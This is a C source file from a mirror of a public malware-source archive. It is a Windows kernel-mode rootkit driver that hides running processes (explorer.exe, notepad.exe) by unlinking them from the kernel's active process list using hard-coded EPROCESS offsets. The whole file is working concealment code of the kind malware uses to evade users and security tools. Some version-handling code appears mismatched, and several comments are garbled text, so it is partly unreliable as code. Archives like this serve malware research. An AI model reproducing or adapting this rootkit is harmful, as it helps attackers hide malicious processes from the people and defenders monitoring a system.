mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 11:55:26 +00:00
176 lines
4.4 KiB
C
176 lines
4.4 KiB
C
#ifndef CXX_HIDEPROCESS_H
|
||
# include "HideProcess.h"
|
||
#endif
|
||
|
||
ULONG_PTR ActiveOffsetPre = 0;
|
||
ULONG_PTR ActiveOffsetNext = 0;
|
||
ULONG_PTR ImageName = 0;
|
||
WIN_VERSION WinVersion = WINDOWS_UNKNOW;
|
||
|
||
NTSTATUS
|
||
DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
|
||
{
|
||
DbgPrint("DriverEntry\r\n");
|
||
|
||
DriverObject->DriverUnload = UnloadDriver;
|
||
|
||
WinVersion = GetWindowsVersion();
|
||
|
||
switch(WinVersion)
|
||
{
|
||
#ifdef _WIN32
|
||
case WINDOWS_XP: //32Bits
|
||
{
|
||
|
||
ActiveOffsetPre = 0x8c;
|
||
ActiveOffsetNext = 0x88;
|
||
ImageName = 0x174;
|
||
break;
|
||
}
|
||
#else
|
||
case WINDOWS_7: //64Bits
|
||
{
|
||
ActiveOffsetPre = 0x190;
|
||
ActiveOffsetNext = 0x188;
|
||
ImageName = 0x2e0;
|
||
break;
|
||
}
|
||
#endif
|
||
default:
|
||
return STATUS_NOT_SUPPORTED;
|
||
}
|
||
|
||
HideProcess("explorer.exe");
|
||
HideProcess("notepad.exe");
|
||
return STATUS_SUCCESS;
|
||
}
|
||
|
||
VOID HideProcess(char* ProcessName)
|
||
{
|
||
PEPROCESS CurrentProcess = NULL;
|
||
PEPROCESS PreProcess = NULL;
|
||
PLIST_ENTRY Temp = NULL;
|
||
|
||
if(!ProcessName)
|
||
return;
|
||
|
||
CurrentProcess = PsGetCurrentProcess(); //System EProcess
|
||
PreProcess = (PEPROCESS)((ULONG_PTR)(*((ULONG_PTR*)((ULONG_PTR)CurrentProcess + ActiveOffsetPre))) - ActiveOffsetNext);
|
||
|
||
while (CurrentProcess != PreProcess)
|
||
{
|
||
//DbgPrint("%s\r\n",(char*)((ULONG_PTR)CurrentProcess + ImageName));
|
||
if(strcmp((char*)((ULONG_PTR)CurrentProcess + ImageName), ProcessName) == 0)
|
||
{
|
||
Temp = (PLIST_ENTRY)((ULONG_PTR)CurrentProcess + ActiveOffsetNext);
|
||
|
||
if (MmIsAddressValid(Temp))
|
||
{
|
||
RemoveEntryList(Temp);
|
||
}
|
||
break;
|
||
}
|
||
|
||
CurrentProcess = (PEPROCESS)((ULONG_PTR)(*((ULONG_PTR*)((ULONG_PTR)CurrentProcess + ActiveOffsetNext))) - ActiveOffsetNext);
|
||
}
|
||
}
|
||
|
||
VOID UnloadDriver(PDRIVER_OBJECT DriverObject)
|
||
{
|
||
DbgPrint("UnloadDriver\r\n");
|
||
}
|
||
|
||
WIN_VERSION GetWindowsVersion()
|
||
{
|
||
RTL_OSVERSIONINFOEXW osverInfo = {sizeof(osverInfo)};
|
||
pfnRtlGetVersion RtlGetVersion = NULL;
|
||
WIN_VERSION WinVersion;
|
||
WCHAR szRtlGetVersion[] = L"RtlGetVersion";
|
||
|
||
RtlGetVersion = (pfnRtlGetVersion)GetFunctionAddressByName(szRtlGetVersion);
|
||
|
||
if (RtlGetVersion)
|
||
{
|
||
RtlGetVersion((PRTL_OSVERSIONINFOW)&osverInfo);
|
||
}
|
||
else
|
||
{
|
||
PsGetVersion(&osverInfo.dwMajorVersion, &osverInfo.dwMinorVersion, &osverInfo.dwBuildNumber, NULL);
|
||
}
|
||
|
||
//x64λ֧<CEBB><D6A7>
|
||
if(osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 1 && osverInfo.dwBuildNumber == 7600)
|
||
{
|
||
DbgPrint("WINDOWS 7\r\n");
|
||
WinVersion = WINDOWS_7_7600;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 1 && osverInfo.dwBuildNumber == 7601)
|
||
{
|
||
DbgPrint("WINDOWS 7\r\n");
|
||
WinVersion = WINDOWS_7_7601;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 2 && osverInfo.dwBuildNumber == 9200)
|
||
{
|
||
DbgPrint("WINDOWS 8\r\n");
|
||
WinVersion = WINDOWS_8_9200;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 3 && osverInfo.dwBuildNumber == 9600)
|
||
{
|
||
DbgPrint("WINDOWS 8.1\r\n");
|
||
WinVersion = WINDOWS_8_9600;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 10240)
|
||
{
|
||
DbgPrint("WINDOWS 10 10240\r\n");
|
||
WinVersion = WINDOWS_10_10240;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 10586)
|
||
{
|
||
DbgPrint("WINDOWS 10 10586\r\n");
|
||
WinVersion = WINDOWS_10_10586;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 14393)
|
||
{
|
||
DbgPrint("WINDOWS 10 14393\r\n");
|
||
WinVersion = WINDOWS_10_14393;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 15063)
|
||
{
|
||
DbgPrint("WINDOWS 10 15063\r\n");
|
||
WinVersion = WINDOWS_10_15063;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 16299)
|
||
{
|
||
DbgPrint("WINDOWS 10 16299\r\n");
|
||
WinVersion = WINDOWS_10_16299;
|
||
}
|
||
else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 17134)
|
||
{
|
||
DbgPrint("WINDOWS 10 17134\r\n");
|
||
WinVersion = WINDOWS_10_17134;
|
||
}
|
||
else
|
||
{
|
||
DbgPrint("This is a new os\r\n");
|
||
WinVersion = WINDOWS_UNKNOW;
|
||
}
|
||
|
||
return WinVersion;
|
||
}
|
||
|
||
PVOID
|
||
GetFunctionAddressByName(WCHAR *wzFunction)
|
||
{
|
||
UNICODE_STRING uniFunction;
|
||
PVOID AddrBase = NULL;
|
||
|
||
if (wzFunction && wcslen(wzFunction) > 0)
|
||
{
|
||
RtlInitUnicodeString(&uniFunction, wzFunction); //<2F><><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8>
|
||
AddrBase = MmGetSystemRoutineAddress(&uniFunction); //<2F><>System <20><><EFBFBD><EFBFBD> <20><>һ<EFBFBD><D2BB>ģ<EFBFBD><C4A3> Ntosknrl.exe ExportTable
|
||
}
|
||
|
||
return AddrBase;
|
||
}
|
||
|